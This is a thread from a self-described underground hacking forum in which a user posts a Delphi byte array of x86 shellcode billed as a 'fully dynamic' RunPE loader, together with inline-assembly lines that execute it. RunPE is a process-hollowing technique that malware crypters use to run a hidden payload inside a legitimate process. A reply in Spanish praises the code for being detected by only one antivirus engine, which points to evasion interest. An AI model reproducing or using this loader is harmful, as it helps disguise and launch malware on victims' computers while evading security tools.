HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Delphi Shellcode RunPE (Fully Dynamic)

Status
Not open for further replies.
H

H4ckCoder

Made in DZ
User
Joined
Feb 20, 2014
Messages
119
Reputation
0
Reaction score
2,356
Points
243
Credits
0
‎11 Years of Service‎
40%
Code: 
>var
 arrRunPE:  array[0..693] of Byte = (
   $55,$8B,$EC,$81,$C4,$A4,$FA,$FF,$FF,$89,$45,$FC,$E8,$1B,$02,$00,$00,$89,$85,$CC,
   $FD,$FF,$FF,$BB,$F2,$0F,$56,$C6,$8B,$95,$CC,$FD,$FF,$FF,$E8,$19,$02,$00,$00,$89,
   $45,$F8,$BB,$A9,$8B,$80,$2D,$8B,$95,$CC,$FD,$FF,$FF,$E8,$06,$02,$00,$00,$89,$45,
   $F4,$BB,$85,$3B,$AE,$DB,$8B,$95,$CC,$FD,$FF,$FF,$E8,$F3,$01,$00,$00,$89,$45,$F0,
   $BB,$93,$35,$DF,$85,$8B,$95,$CC,$FD,$FF,$FF,$E8,$E0,$01,$00,$00,$89,$45,$EC,$BB,
   $8D,$CB,$B6,$5D,$8B,$95,$CC,$FD,$FF,$FF,$E8,$CD,$01,$00,$00,$89,$45,$E8,$BB,$53,
   $13,$C1,$78,$8B,$95,$CC,$FD,$FF,$FF,$E8,$BA,$01,$00,$00,$89,$45,$E4,$BB,$8A,$DB,
   $DF,$A5,$8B,$95,$CC,$FD,$FF,$FF,$E8,$A7,$01,$00,$00,$89,$45,$E0,$BB,$2E,$05,$50,
   $C8,$8B,$95,$CC,$FD,$FF,$FF,$E8,$94,$01,$00,$00,$89,$45,$DC,$BB,$85,$A1,$16,$A2,
   $8B,$95,$CC,$FD,$FF,$FF,$E8,$81,$01,$00,$00,$E8,$06,$00,$00,$00,$6E,$74,$64,$6C,
   $6C,$00,$5F,$57,$FF,$D0,$89,$85,$D0,$FD,$FF,$FF,$BB,$8B,$E3,$CD,$41,$8B,$D0,$E8,
   $60,$01,$00,$00,$89,$45,$D8,$BB,$39,$23,$0D,$2C,$8B,$95,$D0,$FD,$FF,$FF,$E8,$4D,
   $01,$00,$00,$89,$45,$D4,$68,$00,$02,$00,$00,$8D,$85,$D4,$FD,$FF,$FF,$50,$6A,$00,
   $FF,$55,$F8,$6A,$44,$8D,$85,$88,$FD,$FF,$FF,$50,$FF,$55,$D4,$FF,$55,$F4,$8B,$C8,
   $8D,$85,$78,$FD,$FF,$FF,$50,$8D,$85,$88,$FD,$FF,$FF,$50,$6A,$00,$6A,$00,$6A,$04,
   $6A,$00,$6A,$00,$6A,$00,$51,$8D,$85,$D4,$FD,$FF,$FF,$50,$FF,$55,$F0,$68,$CC,$02,
   $00,$00,$8D,$85,$A4,$FA,$FF,$FF,$50,$FF,$55,$D4,$C7,$85,$A4,$FA,$FF,$FF,$02,$00,
   $01,$00,$8D,$85,$A4,$FA,$FF,$FF,$50,$FF,$B5,$7C,$FD,$FF,$FF,$FF,$55,$EC,$64,$A1,
   $30,$00,$00,$00,$8B,$40,$0C,$8B,$40,$14,$8B,$40,$10,$50,$FF,$B5,$78,$FD,$FF,$FF,
   $FF,$55,$D8,$8B,$7D,$FC,$03,$7F,$3C,$6A,$40,$68,$00,$30,$00,$00,$FF,$77,$50,$FF,
   $77,$34,$FF,$B5,$78,$FD,$FF,$FF,$FF,$55,$E8,$89,$85,$74,$FD,$FF,$FF,$6A,$00,$FF,
   $77,$54,$FF,$75,$FC,$FF,$B5,$74,$FD,$FF,$FF,$FF,$B5,$78,$FD,$FF,$FF,$FF,$55,$E4,
   $8D,$47,$18,$89,$85,$70,$FD,$FF,$FF,$0F,$B7,$47,$14,$01,$85,$70,$FD,$FF,$FF,$33,
   $C0,$33,$F6,$33,$C9,$EB,$29,$6B,$C6,$28,$03,$85,$70,$FD,$FF,$FF,$8B,$9D,$74,$FD,
   $FF,$FF,$03,$58,$0C,$8B,$55,$FC,$03,$50,$14,$6A,$00,$FF,$70,$10,$52,$53,$FF,$B5,
   $78,$FD,$FF,$FF,$FF,$55,$E4,$46,$66,$3B,$77,$06,$72,$D1,$8B,$85,$74,$FD,$FF,$FF,
   $03,$47,$28,$89,$85,$54,$FB,$FF,$FF,$8D,$85,$A4,$FA,$FF,$FF,$50,$FF,$B5,$7C,$FD,
   $FF,$FF,$FF,$55,$E0,$FF,$B5,$7C,$FD,$FF,$FF,$FF,$55,$DC,$C9,$C3,$64,$A1,$30,$00,
   $00,$00,$8B,$40,$0C,$8B,$40,$0C,$8B,$00,$8B,$00,$8B,$40,$18,$C3,$55,$8B,$EC,$83,
   $C4,$F4,$52,$89,$55,$FC,$8B,$4A,$3C,$03,$CA,$89,$4D,$F4,$8B,$49,$78,$03,$CA,$89,
   $4D,$F8,$8B,$51,$18,$8B,$49,$20,$03,$4D,$FC,$33,$FF,$8B,$31,$03,$75,$FC,$33,$C0,
   $51,$AC,$8B,$C8,$03,$F8,$D3,$C7,$85,$C0,$75,$F5,$59,$3B,$FB,$74,$10,$83,$C1,$04,
   $4A,$75,$E0,$BA,$C2,$58,$62,$1B,$5A,$33,$C0,$C9,$C3,$8B,$45,$FC,$8B,$4D,$F8,$8B,
   $59,$18,$8B,$49,$24,$03,$C8,$2B,$DA,$D1,$E3,$03,$CB,$0F,$B7,$19,$8B,$4D,$F8,$8B,
   $49,$1C,$03,$C8,$C1,$E3,$02,$03,$CB,$03,$01,$5A,$C9,$C3);

//Example of use:

asm
 MOV EAX, dwArrayToRun
 LEA EBX, arrRunPE[0]
 CALL EBX
end;


Coder/credits : DeadlyVermilion
 
Re: Shellcode RunPE (Fully Dynamic)

Esta RunPe ya la había usado sólo es detectada por ikarus? Buen trabajo,

Ese icode es todo una máquina..

 
Last edited by a moderator:
Status
Not open for further replies.
Back
Top